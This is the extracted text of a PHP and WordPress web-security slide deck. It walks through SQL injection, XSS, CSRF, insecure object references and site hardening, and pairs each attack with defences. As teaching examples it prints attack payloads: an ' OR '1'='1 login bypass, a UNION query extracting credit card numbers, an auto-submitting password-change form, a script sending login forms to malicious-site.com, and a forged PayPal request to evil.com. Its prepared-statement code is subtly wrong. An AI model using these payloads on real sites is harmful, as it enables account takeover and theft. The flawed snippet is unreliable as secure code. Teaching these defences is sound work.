Php Security - OWASP

PHP Security
Hacks, attacks, and getting your site
back
Mizno Kruge
Carijasa, CTO
Email : mizno.kruge@gmail.com
Mobile : +62 813 1097 4914
Telegram : @mizno

 the protection of computer systems from
the theft or damage to their hardware,
software or information, as well as from
disruption or misdirection of the services

From the news…
 143 millions CC
 $2.28 billion
market value.
https://techcrunch.com/tag/equifax-hack/

Physical
 Cables, cards and physical aspects
 Ethernet, FDDI, B8ZS, V.35, V.24,
RJ45.

Data Link
 Data packets are encoded and decoded
into bits
 Media Access Control (MAC) : gains
access to the data and transmit
permission
 Logical Link Control(LLC): controls
frame synchronization, flow control and
error checking
 Tunnels, SSH, PPP, MAC (Ethernet
DSL, ISDN, FDDI)

Network
 switching and routing technologies,
creating logical paths, known as virtual
circuits, for transmitting data
from node to node
 AppleTalk DDP, IP

Transport
 Provides transparent transfer of data
between end systems, or hosts, and is
responsible for end-to-end error
recovery and flow control
 TCP: Fast, low to moderate data
 UDP : Slow, low to big data

Session
 Establishes, manages and terminates
connections between applications
 NFS, NetBios names, RPC, SQL

Presentation
 Provides independence from
differences in data representation
(e.g., encryption) by translating from
application to network format, and vice
versa
 Encryption, ASCII, EBCDIC, TIFF, GIF,
PICT, JPEG, MPEG, MIDI.

Application
 Provides application services for file
transfers, e-mail, and
other network software services. Telnet
and FTP are applications that exist
entirely in the application level. Tiered
application architectures are part of this
layer.
 WWW browsers, Telnet, HTTP, FTP

Attack!
 Active
attempts to alter system resources or
affect their operation
 Passive
attempts to learn or make use of
information from the system but does
not affect system resources

Active Attack
 Denial-of-service attack
 Spoofing
 Man in the middle
 Ping flood & Ping of death

Passive
 Port Scan & Iddle Scan
 Wiretapping

Vulnerability
 a weakness which allows an attacker to
reduce a system's information
assurance
 intersection of three elements: a system
susceptibility or flaw, attacker access to
the flaw, and attacker capability to
exploit the flaw

Exploit vulnerability process
diagram

OWASP Top 10
Regular publication by The Open
Web Application Security Project
Highlights the 10 most-critical web
application security risks

SQL
Injection
 Modifying SQL
statements to:
Spoof identity
Tamper with data
Disclose hidden
information

SQL Injection Basics
$value = $_REQUEST['value'];
SELECT * FROM x WHERE y = '[MALICIOUS CODE
HERE]' ";
$sql = "SELECT * FROM x WHERE y = '$value'
";
$database->query($sql);

Username
Password
Log In
admin
password

Username
Password
Log In
admin
Invalid username or password. Please
try again.
password'

Username
Password
Log In
admin
Unknown error.

tail –n 1 /var/log/apache2/error.log
MySQL error: You have an error in your SQL
syntax; check the manual that corresponds to
your MySQL server version for the right syntax
to use near "password'" at line 1.
tail –n 1 /var/log/mysql/query.log
SELECT * FROM users WHERE username = 'admin'
AND password = 'password'';
$
$

to use near "password'" at line 1.
AND password = 'password'';
$
~~
$

Username
Password
Log In
admin
Unknown error.
' test

to use near "' test" at line 1.
AND password = '' test';
$
$

to use near "' test" at line 1.
$
$
~~~~~~~~

~~~~~~~~
AND password = '';
AND password = '' OR (something that is true);
AND (true);
SELECT * FROM users WHERE username = 'admin';

SELECT * FROM users WHERE username = 'admin' AND
password = '' test ';
' test

' test
~~~~~~~~~~~~~~~

password = ' ';
password = ' ';

password = '' ';
'
password = '' ';
~~~

password = '' ' ';
' '
password = '' ' ';
~~~~~~~~~~~~~~

password = '' OR ' ';
' OR '
password = '' OR ' ';

password = '' OR '1'='1';
' OR '1'='1
password = '' OR '1'='1';

Username
Password
Log In
admin
Unknown error.
' OR '1'='1

Welcome Admin!
Admin Menu:
Give customer money
Take money away
Review credit card
applications
Close accounts

Blind SQL Injection
Invalid username or password. Please try
again.
Unknown error.
Welcome Admin!

Username
Password
Log In
admin
' AND (SELECT id FROM user LIMIT 1) = '

Username
Password
Log In
admin
Unknown error.
ErrorsQuery
password = '' AND (SELECT id FROM user LIMIT 1) = '';

Username
Password
Log In
admin
ErrorsQuery
MySQL error: Unknown table 'user'.
Unknown error.

Username
Password
Log In
admin
' AND (SELECT id FROM users LIMIT 1) = '
ErrorsQuery
MySQL error: Unknown table 'user'.
Unknown error.

Username
Password
Log In
admin
Invalid username or password. Please
try again.

SQL Injection:
Data Disclosure

SQL Injection - Data Disclosure
http://www.onlinebookstore.com/books/123
SELECT * FROM books WHERE id
$id = …;
$sql = "SELECT title, author,
price FROM books WHERE id = "
. $id;
$data = $database-
>query($sql);
{
'title' => 'The Great Gats
'author' => 'F. Scott Fitzge
'price' => 9.75
}

http://www.onlinebookstore.com/books/99999
SELECT * FROM books WHERE id =
$id = …;
. $id;
$data = $database-
>query($sql);
{
}

http://www.onlinebookstore.com/books/?????
$id = …;
. $id;
$data = $database-
>query($sql);
{
'title' => '',
'author' => '',
'price' => 0.00
}

SQL UNION Query
Column 1 Column 2 Column 3
The Great Gatsby F. Scott Fitzgerald 9.75
Column
1
Column 2 Column 3
Foo Bar 123
Foo Bar 123
UNION

SQL UNION Query
Column
1
Column 2 Column 3
(SELECT
)
1 1
(SELECT) 1 1
UNION

SQL UNION Query
(empty)
Column
1
Column 2 Column 3
(SELECT
)
1 1
(SELECT) 1 1
UNION

http://www.onlinebookstore.com/books/99999 UNION SELECT
creditcards
$id = …;
. $id;
$data = $database-
>query($sql);
{
'title' => '',
'author' => '',
'price' => 0.00
}

number AS 'title', 1 AS 'author', 1 AS 'price' FROM
creditcards
$id = …;
. $id;
$data = $database-
>query($sql);
{
'title' => '',
'author' => '',
'price' => 0.00
}

creditcards
99999 UNION SELECT number AS
'title', 1 AS 'author', 1 AS
'price' FROM creditcards
$id = …;
. $id;
$data = $database-
>query($sql);
{
'title' => '',
'author' => '',
'price' => 0.00

creditcards
99999 UNION SELECT number AS
'title', 1 AS 'author', 1 AS
'price' FROM creditcards
$id = …;
. $id;
$data = $database-
>query($sql);
{
'title' => '4012-3456-7890-
'author' => 1,
'price' => 1

$val = $_REQUEST['value'];
$sql = "SELECT * FROM x WHERE y = '$val'
";
Protecting Against
SQL Injection
 Block input with
special characters

Protecting
Against SQL
Injection
special characters
 Escape user input
$value = $_REQUEST['value'];
$escaped = mysqli_real_escape_string($value);
$sql = "SELECT * FROM x WHERE y = '$escaped' ";
' OR '1'
= '1
' OR '1'
= '1
mysqli_real_escape_string()
SELECT * FROM x
WHERE y = '' OR '1' = '1'

Protecting
Against SQL
Injection
special characters
 Escape user input
 Use prepared
statements
$mysqli = new mysqli("localhost", "user", "pass", "db");
$q = $mysqli->prepare("SELECT * FROM x WHERE y = '?' ");
$q->bind_param(1, $_REQUEST['value']);
$q->execute();
Native PHP:
● mysqli
● pdo_mysql
Frameworks / Libraries:
● Doctrine
● Eloquent
● Zend_Db

Other Types of Injection
 NoSQL databases
 OS Commands
 LDAP Queries
 SMTP Headers

XSS
Cross-Site Scripting
 Injecting code into
the webpage (for
other users)
• Execute malicious
scripts
• Hijack sessions
• Install malware
• Deface websites

XSS Attack
Basics
 Raw code/script
is injected onto a
page
$value = $_POST['value'];
$value = $rssFeed->first->title;
$value = db_fetch('SELECT x FROM table');
<?php echo $value ?>

XSS – Cross-Site Scripting
Basics
Snipicons by Snip Master licensed under CC BY-NC 3.0.
Cookie icon by Daniele De Santis licensed under CC BY 3.0.
Hat image from http://www.yourdreamblog.com/wp-content/uploads/2013/04/blackhat.png
Logos are copyright of their respective owners.
<form id="evilform"
action="https://facebook.com/password.php"
method="post">
<input type="password" value="hacked123">
</form>
<script>
document.getElementById('evilform').submit();
</script>

short.ly
Paste a URL here Shorten

short.ly
http://www.colinodell.com Shorten

short.ly
http://www.colinodell.com Shorten
Short URL: http://short.ly/b7fe9
Original URL: http://www.colinodell.com

short.ly
Please wait while we redirect you to
http://www.colinodell.com

short.ly
<script>alert('hello world!');</script> Shorten

short.ly
Short URL: http://short.ly/3bs8a
Original URL:
hello world!
OK
X

short.ly
Original URL:

<p>
Short URL:
<a href="…">http://short.ly/3bs8a</a>
</p>
<p>
Original URL:
<a href="…"><script>alert('hello world!');</script></a>
</p>

short.ly
<iframe src="https://www.youtube.com/embed/dQw4w9WgXcQ"> Shorten

short.ly
<iframe src="https://www.youtube.com/embed/dQw4w9WgXcQ"> Shorten
Original URL:

short.ly

document.getElementById('login-form').action =
'http://malicious-site.com/steal-passwords.php';

Protecting
Against XSS
Attacks $value = $_POST['value'];
$value = db_fetch('SELECT value FROM table');

Protecting
Against XSS
Attacks
• Filter user input
$value = strip_tags($_POST['value']);
$value = strip_tags(
db_fetch('SELECT value FROM table')
);
$value = strip_tags($rssFeed->first->title);

Protecting
Against XSS
Attacks
• Escape user
input
$value = htmlspecialchars($_POST['value']);
$value = htmlspecialchars(
db_fetch('SELECT value FROM table')
);
$value = htmlspecialchars($rssFeed->first->title);
<script> <script>
htmlspecialchars()

Protecting
Against XSS
Attacks
• Escape user
input
• Escape output
$value = $_POST['value'];
$value = db_fetch('SELECT value FROM table');
<?php echo htmlspecialchars($value) ?>

Protecting
Against XSS
Attacks
• Escape user
input
• Escape output
{{ some_variable }}
{{ some_variable|raw }}

CSRF
Cross-Site Request
Forgery
 Execute unwanted
actions on another
site which user is
logged in to.
• Change password
• Transfer funds
• Anything the user
can do

CSRF – Cross-Site Request
Forgery
Hi Facebook! I am
colinodell and my
password is *****.
Welcome Colin!
Here’s your
news feed.

Forgery
Hi other website!
Show me your
homepage.
Sure, here you go!
<form id="evilform"
method="post">
</form>
<script>
</script>

Forgery
<form id="evilform"
method="post">
</form>
<script>
</script>

Forgery
<form id="evilform"
method="post">
</form>
<script>
</script>
Tell Facebook we want to
change our password to
hacked123

Forgery
<form id="evilform"
method="post">
</form>
<script>
</script>
Hi Facebook! Please
change my password
to hacked123.
Done!

Forgery
short.ly
<img src="https://paypal.com/pay?email=me@evil.com&amt=9999"> Shorten

Forgery
short.ly
X

Protecting
Against CSRF
Attacks
 Use randomized
CSRF tokens <input type="hidden" name="token"
value="ao3i4yw90sae8rhsdrf">
1. Generate a random string per user.
2. Store it in their session.
3. Add to form as hidden field.
4. Compare submitted value to session
1.Same token? Proceed.
2.Different/missing? Reject the
request.

Insecure
Direct
Object
References
 Access &
manipulate
objects you
shouldn’t have
access to

Insecure Direct Object
References

Insecure Direct Object
References
Beverly

Protecting
Against
Insecure Direct
Object
References
 Check permission
on data input
• URL / route parameters
• Form field inputs
• Basically anything that’s
an ID
• If they don’t have
permission, show a 403 (or
404) page

Protecting
Against
Insecure Direct
Object
References
on data input
on data output
• Do they have permission to
access this object?
• Do they have permission to
even know this exists?
• This is not “security
through obscurity”

Sensitive Data
Exposure
Security
Misconfiguration
Components with
Known Vulnerabilities

http://www.example.com/CHANGELOG
http://www.example.com/composer.lock
http://www.example.com/.git/
http://www.example.com/.env
http://www.example.com/robots.txt
Sensitive Data Exposure

Sensitive Data Exposure -
CHANGELOG

Sensitive Data Exposure –
composer.lock

Sensitive Data Exposure – .git

Sensitive Data Exposure –
robots.txt

Private information that is stored, transmitted, or backed-up in clear text (or with weak encryption)
• Customer information
• Credit card numbers
• Credentials
Sensitive Data Exposure

Security Misconfiguration &
Components with Known
Vulnerabilities
Default accounts enabled; weak passwords
• admin / admin
Security configuration
• Does SSH grant root access?
• Are weak encryption keys used?
Out-of-date software
• Old versions with known issues
• Are the versions exposed?
• Unused software running (FTP server)

Vulnerabilities

Protecting
Against
Sensitive Data Exposure, Security
Misconfiguration, and
Vulnerabilities
 Keep software up-
to-date
• Install critical updates
immediately
• Install other updates regularly

Protecting
Against
Vulnerabilities
to-date
 Keep sensitive data
out of web root
• Files which provide version
numbers
• README, CHANGELOG, .git, composer.lock
• Database credentials & API keys
• Encryption keys

Protecting
Against
Vulnerabilities
to-date
out of web root
 Use strong
encryption
• Encrypt with a strong private
key
• Encrypt backups and data-in-
transit
• Use strong hashing techniques
for passwords

Protecting
Against
Vulnerabilities
to-date
out of web root
 Use strong
encryption
 Test your systems
• Scan your systems with automated
tools
• Test critical components
yourself
• Automated tests
• Manual tests

Next Steps
 Test your own applications for
vulnerabilities
 Learn more about security & ethical hacking
 Enter security competitions (like CtF)
 Stay informed

WordPress Hacks
Warning! Massive Number of GoDaddy
WordPress Blogs Hacked!
DreamHost: One Million Domains Hacked;
WordPress Blogs Infected
WordPress Sites on GoDaddy, Bluehost
Hacked
Reuters Hacked Again, Outdated
WordPress Blog At Fault?
InMotion Hosting Servers Hacked,
Thousands of Web Sites Affected

WordPress Hacks
History shows there have been very few
“WordPress Hacks”
“ In the vast majority of cases I see,
attackers get in some other way, and
then once already in the system, they
go looking for WordPress installs.” --
Mark Jaquith

If WordPress isn’t the weak
point, what is?

WordPress Hacks
Most hacks that affect WordPress
actually originate outside of WordPress
Core.
TimThumb (PHP library, many
themes/plugins)
Uploadify (jQuery plugin, many
themes/plugins)
Adserve (plugin)
WassUp (plugin)
Is Human (plugin)

Shared Hosting
Shared hosting? Shared security!
Other users on the same server as you
can become a security risk that affects
you
What about your own users? Can you
trust everyone who has a login for your
site? Really trust them?
https://www.tcpiputils.com/reverse-ip
http://www.ipneighbour.com/

How do hackers get in?
Known exploits in vulnerable software
Brute-force password hacking
Network scanners
Firesheep
Wifi vulnerabilities (WEP/WPA)
Automated tools
Rootkits

Three Words
Update
Update
Update

Three Words
Update Core
Update Plugins
Update Themes

What Else?
Hotfix Plugin
WP Security Scanner
Login Lockdown
BulletProof Security
Sucuri.net

What Else?
Not using a plugin anymore?
Deactivate
DELETE!
The same goes for themes

Now What?
You can no longer trust any code files
Nuke the site, start from trusted, fresh
copies
Save wp-config.php and wp-content/uploads
Reinstall data from backups
You do have backups, right?
Right?

What do I back up?
Database
Uploaded media (wp-content/uploads)
Custom themes and plugins
wp-config.php
Keep a list of your installed third-party
plugins

How do I back up?
Backup Buddy
VaultPress
WordPress Backup to Dropbox

It can happen to you
It can happen to me
It can happen to everyone, eventually
-- Yes, It Can Happen, 90125

Healthy Paranoia
Use strong passwords
Two-factor authentication -- Google
Authenticator plugin
Use separate WordPress logins for
publishing day-to-day content and for
site administration
Limit who can login to your site, and
what permissions they have
Create temporary accounts for developers, if
necessary

Healthy Paranoia
Use secure protocols: SFTP, SCP, SSH --
not FTP
If possible, enforce SSL on WordPress logins
and dashboard access
Ensure MySQL server is not accessible to
other hosts
Same goes for memcache (or any other data
store)

Getting help
Security is part of the cost of doing business, like insurance
If you don’t know how to do all this, retain the services of
someone who does
Managed hosting:
Page.ly
WordPress.com
WP Engine
Zippykid
Cloudways
AWS with pre-built WP optimized

Security for WP Developers
Settings API, nonces, validation
handlers
Data escaping functions: esc_*()
esc_html()
esc_attr()
esc_sql()
esc_url() & esc_url_raw()
esc_js

Thanks!
Mizno Kruge
mizno@carijasa.co.id
+6281310974914

Php Security - OWASP

More Related Content

What's hot (20)

Similar to Php Security - OWASP (20)

More from Mizno Kruge (8)

Recently uploaded (20)

Php Security - OWASP